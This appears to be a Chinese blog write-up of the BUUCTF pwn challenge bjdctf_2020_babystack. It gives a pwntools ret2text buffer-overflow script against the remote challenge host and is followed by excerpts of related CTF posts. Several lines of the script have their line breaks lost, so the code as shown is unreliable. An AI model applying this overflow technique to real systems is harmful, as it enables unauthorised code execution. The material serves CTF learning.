【BUUCTF】bjdctf_2020_babystack Write Up

继续刷buuoj中…
看到上新题了，是当时比赛的时候做过的一道题，顺手打掉

程序只开了NX保护，读入字符数可控，直接ret2text解决

遇到的小问题是，本地环境打0x4006E6打不通，换成了0x4006EA，后来测试远程环境2个都可以，有点迷 =_=

from pwn import *
from LibcSearcher import *
from struct import packcontext.os='linux'
context.arch='amd64'
context.log_level='debug'sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)io=remote('node3.buuoj.cn',28201)
#io=process('./bjdctf_2020_babystack')
elf=ELF('./bjdctf_2020_babystack')ra()
sl('32')
ra()
sl('a'*24+p64(0x4006e6))io.interactive()

【BUUCTF】bjdctf_2020_babystack Write Up相关推荐

【buuctf】cscctf_2019_qual_babyheap
buuctf[cscctf_2019_qual_babyheap] 今天找了一道100分题目,题目本身并没有那么难例行检查 64位的程序,保护机制全开,放到IDA中分析漏洞分析函数功能很简单,功 ...
【BUUCTF】Crypto题解
文章目录 MD5 一眼就解密 Url编码看我回旋踢摩丝 password 变异凯撒 Quoted-printable Rabbit 篱笆墙的影子 RSA Alice与Bob 丢失的MD5 RSA ...
【BUUCTF】梅花香之苦寒来
0x00 做了几天BUU的题,发现这个题有点儿意思,学了几个工具,顺便写个WP.(参考了这位大佬的WP: BUUCTF 梅花香自苦寒来) 0x01 下载下来一个压缩包,打开是一张图片,先解压,发现 ...
【BUUCTF】[Zer0pts2020]Can you guess it?
源码 <?php include 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i ...
【BUUCTF】强网杯 2019随便注1 write up
输入万能密码1' or 1=1# ,判断存在sql注入, SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台. 万能密码原理: 万能密码能够绕过sql检测,在 ...
【BUUCTF】CTF_Crypto 密码学_Quoted-printable(引用可打印)
Quoted-printable_ 引用可打印题目密文:=E9=82=A3=E4=BD=A0=E4=B9=9F=E5=BE=88=E6=A3=92=E5=93=A6 QP介绍 Quoted-Pri ...
【BUUCTF】[MRCTF2020]套娃
思考题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧. 知识点 substr_count(),用空格或者.或者大写的url编码 preg_mach(),%0a绕过本地 ...
【BUUCTF】[安洵杯 2019]吹着贝斯扫二维码
题目链接:[安洵杯 2019]吹着贝斯扫二维码. 下载压缩包解压得到这么一些文件,可以看到一堆未知类型文件和一个flag.zip 老规矩,把这些没有拓展名的文件用010Editor打开,发现都是jpg ...
【BUUCTF】[强网杯 2019]随便注 1
这是一个典型的sql注入题目知识点: 1.注入点检测 2.万能匹配 3.暴力获得数据表和其属性 4.sql语句的掌握(order by; union select; rename table; al ...

【BUUCTF】bjdctf_2020_babystack Write Up

【BUUCTF】bjdctf_2020_babystack Write Up相关推荐

最新文章

热门文章